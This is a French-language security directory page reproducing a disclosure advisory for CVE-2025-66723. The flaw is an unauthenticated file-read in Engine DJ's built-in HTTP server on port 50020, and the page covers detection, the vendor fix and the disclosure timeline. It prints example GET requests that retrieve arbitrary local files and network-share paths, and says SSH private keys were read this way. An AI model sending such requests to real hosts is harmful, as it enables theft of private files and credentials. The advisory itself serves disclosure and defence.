Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cve-2025-66723 — CVE-2025-66723 : inMusic Brands Engine DJ >=3.0.0 jusqu'à <4.3.4 expose les fichiers locaux et réseau à des parties externes | Kitploit
Outils/GitHubGitHub/audiopump/cve-2025-66723
Analyse des VulnérabilitésExploitationExfiltration de DonnéesCollecte d'InformationsSécurité WebSécurité Réseau
GitHubaudiopump/cve-2025-66723

cve-2025-66723

CVE-2025-66723 : inMusic Brands Engine DJ >=3.0.0 jusqu'à <4.3.4 expose les fichiers locaux et réseau à des parties externes

Voir le dépôt
5il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-66723 : inMusic Brands Engine DJ >=3.0.0 à <4.3.4 expose des fichiers locaux et réseau à des parties externes

Synopsis

Le logiciel Engine DJ d'inMusic Brands contient un serveur HTTP intégré pour transmettre les fichiers de la bibliothèque multimédia aux clients connectés sur le réseau. Les fichiers multimédia sont référencés par un chemin du système de fichiers. Engine DJ n'authentifie pas les clients ni ne restreint les chemins demandés. Cela permet à un attaquant d'exfiltrer des fichiers sensibles, locaux ou accessibles via le réseau, depuis les systèmes affectés.

Un attaquant a uniquement besoin d'un accès réseau à l'hôte affecté ; aucune authentification ni interaction préalable n'est requise.

Engine DJ v4.3.4, publié le 17 novembre 2025, inclut une atténuation. Les utilisateurs sont invités à mettre à jour dès que possible.

Classification de la vulnérabilité

  • CWE-552 : Fichiers ou répertoires accessibles à des parties externes
  • CWE-862 : Autorisation manquante

Sévérité

Score de base CVSS v3.1 : 7.5 (Élevé)

Vecteur : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Versions affectées

Engine DJ >=3.0.0, <4.3.4, sur toutes les plateformes (macOS, Windows).

Versions spécifiquement testées comme affectées/vulnérables, macOS et Windows :

3.0.0, 3.0.1, 3.1.0, 3.1.1, 3.2.0, 3.3.0, 3.4.0,

4.0.0, 4.0.1, 4.1.0, 4.2.0, 4.2.1, 4.3.0

Versions spécifiquement testées comme non affectées, macOS et Windows :

2.0.0, 2.0.1, 2.0.2, 2.1.0, 2.2.0, 2.2.1, 2.2.2, 2.3.0, 2.3.1, 2.3.2, 2.4.0,

4.3.4

Détails

Demandes normales de fichiers multimédia

Lorsqu'il est démarré, Engine DJ se lie au port :50020 sur chaque interface réseau IPv4, à l'exception de localhost.

Les clients sont censés utiliser un service gRPC séparé sur le port :50010 pour demander l'accès et rechercher des fichiers multimédia. Une fois le chemin du fichier multimédia souhaité trouvé, le client envoie alors une requête HTTP de retour sur le port :50020 :

root@kitploit:~
GET /download/%3CC%3A%2FMusic%2Ftest.flac%3E HTTP/1.1
Host: 192.0.2.1:50020
User-Agent: EngineOS/1.0 DenonDJ
Accept: */*
root@kitploit:~
HTTP/1.1 200 OK
Content-Length: 37517194
Content-Type: application/octet-stream
Keep-Alive: timeout=5, max=5

…

Remarque : une fois décodé, le chemin GET ci-dessus est simplement :

root@kitploit:~
/download/<C:/Music/test.flac>

Il n'est pas nécessaire d'encoder en pourcentage ces caractères lors des requêtes.

Demandes malveillantes de fichiers locaux arbitraires

Un attaquant peut demander tout élément accessible à l'utilisateur sous lequel le logiciel Engine DJ s'exécute, à condition que le chemin soit connu de l'attaquant. Dans cet exemple, un fichier texte est utilisé pour les tests :

root@kitploit:~
GET /download/<C:/Users/USERNAME/test.txt> HTTP/1.1
Host: 192.0.2.1:50020
root@kitploit:~
HTTP/1.1 200 OK
Content-Length: 40
Content-Type: application/octet-stream
Keep-Alive: timeout=5, max=5

INSECURE...

From text file test.txt

Les fichiers consultés lors des tests en laboratoire de preuve de concept comprenaient des clés SSH privées et des fichiers d'environnement.

Fichiers réseau

Les chemins demandés ne se limitent pas aux fichiers locaux. Des chemins réseau se sont également avérés accessibles, sous réserve des permissions de l'hôte :

root@kitploit:~
/download/<//EXAMPLE-SERVER/C$/secret.txt>

Requêtes web cross-origin

Heureusement, il n'y a pas d'en-tête Access-Control-Allow-Origin ni d'en-têtes associés dans la réponse du serveur. Par conséquent, les fichiers ne sont pas accessibles depuis des clients web normaux. Certaines extensions de navigateur ou indicateurs peuvent être utilisés pour assouplir les restrictions de requêtes cross-origin, mais cela reste peu courant.

Détection

Le trafic réseau IPv4 sur le port :50020 peut être utilisé pour deviner qu'Engine DJ est en cours d'utilisation, mais cela n'indique pas si un hôte est vulnérable. Le serveur intégré ne s'identifie pas dans ses réponses et il n'y a apparemment aucune différence mesurable entre les versions vulnérables et non vulnérables d'Engine DJ. Par conséquent, il ne semble pas possible de déterminer de l'extérieur si un hôte est vulnérable, à moins de tenter de demander un fichier connu pour exister.

Atténuation

Immédiatement après la découverte, inMusic Brands a été informé de la vulnérabilité via ses canaux de support technique. La réponse a été professionnelle et rapide, et une atténuation du problème a été publiée dans le cadre de la v4.3.4 le 17 novembre 2025 pour macOS et Windows.

Bien que les fichiers multimédia puissent encore être téléchargés sans authentification/autorisation, les chemins pouvant être demandés sont désormais en liste blanche, de sorte qu'il est impossible de tenter d'accéder à un fichier en dehors de la bibliothèque multimédia. Les utilisateurs recevront une réponse 403 pour tout ce qui ne figure pas sur la liste blanche, même si cela n'existe pas.

root@kitploit:~
GET /download/<C:/Users/USERNAME/test.txt> HTTP/1.1
Host: 192.0.2.1:50020
root@kitploit:~
HTTP/1.1 403 Forbidden
Content-Length: 17
Content-Type: text/html
Keep-Alive: timeout=5, max=5

…

Les téléchargements officiels des dernières versions d'Engine DJ sont disponibles sur le site officiel d'Engine DJ :

https://enginedj.com/downloads

Contact

Pour toute question concernant ce rapport, veuillez contacter l'auteur :

Brad Isbell, AudioPump, Inc. [email protected]

Télécharger l’outil